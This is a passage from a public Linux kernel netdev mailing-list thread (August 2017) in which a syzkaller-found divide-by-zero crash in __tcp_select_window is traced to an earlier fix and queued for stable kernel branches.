> Ubuntu-1.8.2-1ubuntu1 04/01/2014
> task: ffff880076ab9900 task.stack: ffff880062ae8000
> RIP: 0010:[<ffffffff829c1df3>] [<ffffffff829c1df3>]
> __tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
...
> [<ffffffff8297c36e>] tcp_cleanup_rbuf+0x43e/0x4f0 net/ipv4/tcp.c:1468
> [<ffffffff829815df>] tcp_recvmsg+0xc2f/0x25d0 net/ipv4/tcp.c:1937
Thanks for the report. I believe this tcp_recvmsg => tcp_cleanup_rbuf
=> __tcp_select_window divide-by-zero issue was fixed in May by Wei,
in:
499350a5a6e7 tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0
https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=499350a5a6e7
Looks like we should probably mark this as a -stable candidate, so
that it will eventually make it to 4.4.y, 4.9.y, 4.12.y users, etc. (I
don't see the commit in those stable branches.)
thanks,
neal
^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: net/ipv4: divide error in __tcp_select_window
2017-08-31 11:11 ` Neal Cardwell
@ 2017-08-31 19:25 ` David Miller
2017-08-31 19:37 ` Neal Cardwell
0 siblings, 1 reply; 4+ messages in thread
From: David Miller @ 2017-08-31 19:25 UTC (permalink / raw)
To: ncardwell; +Cc: idaifish, kuznet, netdev, syzkaller, weiwan, edumazet
From: Neal Cardwell <ncardwell@google.com>
Date: Thu, 31 Aug 2017 07:11:28 -0400
> Thanks for the report. I believe this tcp_recvmsg => tcp_cleanup_rbuf
> => __tcp_select_window divide-by-zero issue was fixed in May by Wei,
> in:
>
> 499350a5a6e7 tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0
> https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=499350a5a6e7
>
> Looks like we should probably mark this as a -stable candidate, so
> that it will eventually make it to 4.4.y, 4.9.y, 4.12.y users, etc. (I
> don't see the commit in those stable branches.)
Ok, queued up for -stable, thanks.
^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: net/ipv4: divide error in __tcp_select_window
2017-08-31 19:25 ` David Miller
@ 2017-08-31 19:37 ` Neal Cardwell
0 siblings, 0 replies; 4+ messages in thread
From: Neal Cardwell @ 2017-08-31 19:37 UTC (permalink / raw)
To: David Miller
Cc: idaifish, Alexey Kuznetsov, Netdev, syzkaller, Wei Wang, Eric Dumazet
On Thu, Aug 31, 2017 at 3:25 PM, David Miller <davem@davemloft.net> wrote:
>
> From: Neal Cardwell <ncardwell@google.com>
> Date: Thu, 31 Aug 2017 07:11:28 -0400
>
> > Thanks for the report. I believe this tcp_recvmsg => tcp_cleanup_rbuf
> > => __tcp_select_window divide-by-zero issue was fixed in May by Wei,
> > in:
> >
> > 499350a5a6e7 tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0
> > https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=499350a5a6e7
> >
> > Looks like we should probably mark this as a -stable candidate, so
> > that it will eventually make it to 4.4.y, 4.9.y, 4.12.y users, etc. (I
> > don't see the commit in those stable branches.)
>
> Ok, queued up for -stable, thanks.
Great. Thanks!
neal
^ permalink raw reply [flat|nested] 4+ messages in thread
end of thread, other threads:[~2017-08-31 19:37 UTC | newest]
Thread overview: 4+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2017-08-31 5:56 net/ipv4: divide error in __tcp_select_window idaifish
2017-08-31 11:11 ` Neal Cardwell
2017-08-31 19:25 ` David Miller
2017-08-31 19:37 ` Neal Cardwell
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).